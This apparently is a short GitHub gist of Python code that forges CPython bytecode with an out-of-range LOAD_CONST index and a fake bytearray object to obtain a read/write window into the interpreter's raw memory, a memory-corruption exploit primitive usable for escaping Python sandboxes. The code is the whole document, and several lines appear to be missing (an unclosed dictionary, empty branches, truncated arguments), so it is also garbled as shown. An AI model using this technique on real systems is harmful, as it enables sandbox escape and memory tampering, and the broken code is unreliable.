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Last active May 13, 2024 15:02
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# import nothing
Tested in cpython 3.6, 3.8 (from the arch repos) on 64-bit arch linux
nullfunc = lambda: None
#from types import CodeType, FunctionType
CodeType = nullfunc.__code__.__class__
FunctionType = nullfunc.__class__
#from dis import opmap
opmap = {
"LOAD_CONST": 100,
INT64_MAX = (1<<63)-1
INT32_MAX = (1<<31)-1
INT32_MIN = -(1<<31)
p64a = lambda *n: [(a >> i) & 0xFF for a in n for i in range(0, 64, 8)]
nogc = set() # things we want to keep a reference to, to prevent gc
def refbytes(data):
# get the address of the internal buffer of a bytes object
return id(data) + 0x20
def ref(addr):
# make a pointer to the passed pointer
ptrbuf = bytes(p64a(addr))
return refbytes(ptrbuf)
def ptr2obj(addr):
# addr is the address of an object
const_tuple = ()
const_tuple_array_start = id(const_tuple) + 0x18
offset = (ref(addr) - const_tuple_array_start) // 8
assert(INT32_MIN <= offset <= INT32_MAX)
bytecode = []
for i in range(1, 4):
bytecode += [opmap["EXTENDED_ARG"], (offset>>(32-i*8)) & 0xFF]
bytecode += [opmap["LOAD_CONST"], offset & 0xFF]
bytecode += [opmap["RETURN_VALUE"]]
code_args = []
for argname in CodeType.__doc__.split("(")[1].split("[")[0].split(","):
argname = argname.strip()
if argname == "codestring":
elif argname == "constants":
code_args.append(getattr(nullfunc.__code__, "co_"+argname))
return FunctionType(CodeType(*code_args), {})()
fake_bytearray = bytes(p64a(
0, 0, 0, 0
magic = ptr2obj(refbytes(fake_bytearray))
# magic is now a rw window into raw memory
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